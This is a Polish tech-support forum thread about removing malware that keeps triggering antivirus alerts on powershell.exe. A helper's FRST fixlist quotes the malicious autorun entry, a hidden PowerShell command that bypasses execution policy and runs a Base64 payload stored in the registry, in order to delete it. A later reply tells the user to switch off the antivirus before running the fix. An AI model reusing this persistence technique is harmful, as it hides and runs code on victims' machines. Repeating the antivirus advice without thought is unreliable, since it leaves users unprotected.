Problem z powershell.exe


(Gerwand221) #1

Od pewnego czasu co chwilę wyskakuje mi powiadomienie o infekcji z pliku powershell.exe

FRST: http://wklej.org/id/1839157/

Addition: http://wklej.org/id/1839158/

Shortcut: http://wklej.org/id/1839162/

 


(Atis) #2

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist :

CloseProcesses:
HKU\S-1-5-21-870124490-3849452074-2056059067-1000\...\Run: [{A31CA996-B4BB-402F-B192-92E280172E17}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\HOORAVDCHAABAN').QWEJVUREKYGHMBI)));
S2 VMAuthdService; C:\Users\pc\vmware-authd.exe [X]
Task: {252F26F3-F4C0-4430-AEDE-E970F224C44A} - System32\Tasks\{790CBFAF-41FA-4F3A-8E48-8D9ED4070D41} => pcalua.exe -a "E:\Program Files (x86)\Square Enix\Sleeping Dogs\redist\vcredist_x86.exe" -d "E:\Program Files (x86)\Square Enix\Sleeping Dogs\redist"
Task: {44495641-B6DA-457E-BDD2-BF0E38B2C912} - System32\Tasks\{F93AF21C-7AED-44EA-BD56-0496400ACF67} => pcalua.exe -a "E:\Program Files (x86)\Square Enix\Sleeping Dogs\redist\D3D11Install_2010.exe" -d "E:\Program Files (x86)\Square Enix\Sleeping Dogs\redist"
Task: {864C7708-BA84-486A-B58A-C8850053A747} - System32\Tasks\{64989164-160D-4C7E-A0B4-563D9E1AFAEF} => pcalua.exe -a "E:\Program Files\Batklefield\Uninstaller.exe" -d "E:\Program Files\Batklefield"
Task: {1B029C02-420D-4F84-A70F-6DF346DFDB64} - System32\Tasks\{257DE0FD-F963-45F3-9985-C1FCBA85013B} => C:\Users\pc\Desktop\Symulacja\Symulacja\pozar\Symulacja pożaru.exe
Task: {90724C56-9C07-4BBF-9133-3BA4D96E74E8} - System32\Tasks\{78366C97-3AFC-49BD-B110-59EE75B392CC} => C:\Users\pc\Desktop\Symulacja\Symulacja\pozar\Symulacja pożaru.exe
Task: {A0101D5B-B356-46E4-ACCD-9ACFAB1997DB} - System32\Tasks\{352B80DA-B47F-4E0F-96E7-8A9B84BFD435} => C:\Users\pc\Desktop\Symulacja\Symulacja\pozar\Symulacja pożaru.exe
Task: {A095D447-2AAC-4B6B-B37A-0192EDF2FA7B} - System32\Tasks\{FF4200CF-D2B1-4871-A678-BF3645023473} => C:\Users\pc\Desktop\Symulacja\Symulacja\pozar\Symulacja pożaru.exe
Task: {BF515484-279C-41E0-8670-4C03401D5F04} - System32\Tasks\{2D4650FA-DC10-4F1A-B4FC-7307BCA93076} => C:\Users\pc\Desktop\Symulacja\Symulacja\pozar\Symulacja pożaru.exe
Task: {E5AF1D6D-8BB3-43EF-AF6B-014BC2B187AB} - System32\Tasks\{5A396D67-7905-47B6-A522-0435B851DB2E} => C:\Users\pc\Desktop\Symulacja\Symulacja\pozar\Symulacja pożaru.exe
Task: {E9A6CA2B-BA09-4BC6-AD7C-22C0424BD9E4} - System32\Tasks\{B28B7722-DAB0-43F4-8898-A0CD30C0A660} => C:\Users\pc\Desktop\Symulacja\Symulacja\pozar\Symulacja pożaru.exe
DeleteKey: HKCU:\Software\Classes\HOORAVDCHAABAN
EmptyTemp:

Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.


(Gerwand221) #3

Fixlog: http://wklej.org/id/1839207/

FRST: http://wklej.org/id/1839214/

Edit: Komunikat nadal się pojawia :confused:


(Atis) #4

Wyłącz ten program antywirusowy i wtedy wykonaj fixlist.